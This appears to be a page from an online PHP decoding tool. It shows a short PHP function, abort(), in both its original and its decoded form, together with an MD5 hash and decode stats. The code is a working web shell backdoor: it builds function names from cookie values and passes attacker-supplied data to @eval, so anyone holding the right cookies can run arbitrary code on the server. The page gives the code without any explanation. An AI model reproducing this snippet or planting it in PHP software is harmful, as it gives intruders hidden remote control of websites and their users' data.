Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function abort() { $x = $_COOKIE; ($x && isset($x[19])) ? (($gn = $x[19].$x[35]..
Decoded Output download
<?php
function abort() {
$x = $_COOKIE;
($x && isset($x[19])) ? (($gn = $x[19].$x[35]) &&
($qf = $gn($x[70].$x[29])) && ($_qf = $gn($x[71].$x[36])) &&
($_qf = $_qf($gn($x[66]))) && @eval($_qf)) : $x;
return 0;
}
abort(); ?>
Did this file decode correctly?
Original Code
<?php
function abort() {
$x = $_COOKIE;
($x && isset($x[19])) ? (($gn = $x[19].$x[35]) &&
($qf = $gn($x[70].$x[29])) && ($_qf = $gn($x[71].$x[36])) &&
($_qf = $_qf($gn($x[66]))) && @eval($_qf)) : $x;
return 0;
}
abort();
Function Calls
abort | 1 |
Stats
MD5 | 669c26b2040c79501322f8bdf883d8d9 |
Eval Count | 0 |
Decode Time | 74 ms |